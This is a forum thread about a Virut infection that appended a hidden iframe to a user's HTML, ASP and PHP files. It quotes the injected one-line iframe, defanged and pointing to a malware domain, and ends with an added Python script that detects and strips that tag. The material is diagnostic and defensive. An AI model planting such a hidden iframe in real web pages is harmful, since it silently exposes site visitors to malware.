Virut.NAM [solved]

Hi there, Posted in a couple of other threads about this, but see after a search there is not any information and started a new thread. I found this last night and after a complete Nod32 scan it seems like it wants to delete 13728 html files... I rebooted into a PE shell and the files looked OK, so assumed they could be cleaned. Installed Kaspersky this morning which has gone through and disinfected the files, and reports that all is well... Nod32 however is now reporting that there are still 10000+ infected files. Kaspersky says it is all OK.... So, I am at a loss what to do... I've only seen two references on this, one the same as me, but a restore fixed him ok. The other was a mention on how this virus 'slipped under the Nod32 radar'. I have ten years plus work backed up to removable disks, and ghost images, of which it appears they are all infected... Any help would be much appreciated. Mark
Hi there, the Virut family of viruses uses polymorphism to hide from all antivirus protection; it infects executable files. File infection makes it very hard to repair a system that has been infected. I would strongly recommend rebuilding the system from backups. Windows can be rebuilt as described in the following link: http://www.informationweek.com/showArticle.jhtml?articleID=189400897 or, failing this, a format of the system will be required. Cheers
But I don't understand...the only thing that has been affected is html files? My system is OK, I have a backup of that at various stages, it is just my data. Basically every html file on my disk is being flagged as a virus... Can I submit one of these files to Eset? Every backup I have of my 'data' has got these flagged changed files.
Virut is very nasty. I have seen it modify a lot of files into malware. Did you try to upload some of these files to Jotti or VirusTotal to see what other AVs say about them?
This is on a Vista Ultimate installation with Nod32, Spybot S&D, Ad-Aware etc. The system is always clean, as I restore the ghost image, install MS updates, and AV definitions, then backup again.
I just ran the scanner and it came up with this result: http://www.virustotal.com/resultado.html?422cf328112982c1ad39b8ba079b4f76
There is nothing wrong with windows, it is a clean install that has been restored from a ghost image. It is my data that needs to be recovered...these are already corrupt. I couldn't care less about windows, it's retrieval of my html files that is paramount...
You can use this link http://www.eset.com/threat-center/up/submit.htm to upload a file to Eset for testing. It may just be a false positive you're seeing, but better that the developers get to look at the file. Jon
Sent some files to Eset... Just to clarify the above, Kaspersky only fixed about 3000 of the 13000 reported threats. I did run Bitdefender as well, but that only pulled out a handful as well. Of all the products I have tried, Nod32 is actually reporting the most infections, so in all honesty it probably is the better product. It's just a shame it did not detect it at source when it arrived.... I have had a bullet proof system for years now, and it is a real pain this happening. I guess having it bullet proof has meant that I have become complacent with regular scans etc. Saying that though, it would not have made any difference if it was already infected. Can anyone elaborate on the 'went under the radar' comment? Sounds like it was some time before this was added to the definitions list... Thanks everyone for your help. Have sent some more files to Eset....hopefully they will come up with something, or will have to start seeing what I have backed up to DVD.... It appears backing up to removable disks is not such a good idea after all! Shame I don't have a spare 3592 drive knocking around LOL! Mark
Just had a reply from the very helpful Dan @ Eset. He says that this appends the following to html files... <iframe src="hxxp://ntkrnlpa.info/cr/?i=1" width=1 height=1></iframe> Replacing the xx with tt of course! After checking my files, it is indeed this. I have asked if there is a simple fix to this, but it's looking good...! Mark
Dan gave me this link to search/replace....worked like a charm! http://www.rjlsoftware.com/software/utility/search/download.shtml
Hi Mark, I am new to this forum, please excuse my ignorance. I have the same problem with the iframe you mentioned being inserted into all the html, asp and php files. After you performed the search/replace on all the affected htm, asp and php files, did it completely resolve your problem? Ossie
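The search/replace cleanup described in the thread, sketched as an added example that is not part of the original posts or any vendor tool: it finds the appended iframe quoted above in html, htm, asp and php files, reports by default, and rewrites only on request. The function names, the regex and the `.infected` backup suffix are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# Domain comes from the thread; the scheme is matched as http or defanged hxxp.
IFRAME_RE = re.compile(
    rb'<iframe\s+src\s*=\s*"?h(?:tt|xx)p://ntkrnlpa\.info/[^">\s]*"?[^>]*>\s*</iframe>',
    re.IGNORECASE,
)
# File types named in the thread (html, asp, php).
EXTENSIONS = {".html", ".htm", ".asp", ".php"}


def strip_iframe(data: bytes):
    """Return (cleaned_bytes, removed_count); bytes in, bytes out, so encodings survive."""
    return IFRAME_RE.subn(b"", data)


def clean_tree(root, apply=False):
    """Report files carrying the iframe; rewrite them only when apply=True."""
    hits = {}
    # sorted() materialises the listing before any backup files are created.
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        original = path.read_bytes()
        cleaned, count = strip_iframe(original)
        if count == 0:
            continue
        hits[str(path)] = count
        if apply:
            # Hypothetical backup suffix: keep the untouched copy for later analysis.
            path.with_name(path.name + ".infected").write_bytes(original)
            path.write_bytes(cleaned)
    return hits


if __name__ == "__main__":
    # Usage: python strip_iframe.py <directory> [--apply]
    found = clean_tree(sys.argv[1], apply="--apply" in sys.argv[2:])
    for name, count in found.items():
        print(f"{count} injected iframe(s): {name}")
```

Removing the tag repairs the pages only; the point made earlier in the thread that Virut infects executable files still applies to whichever machine modified them.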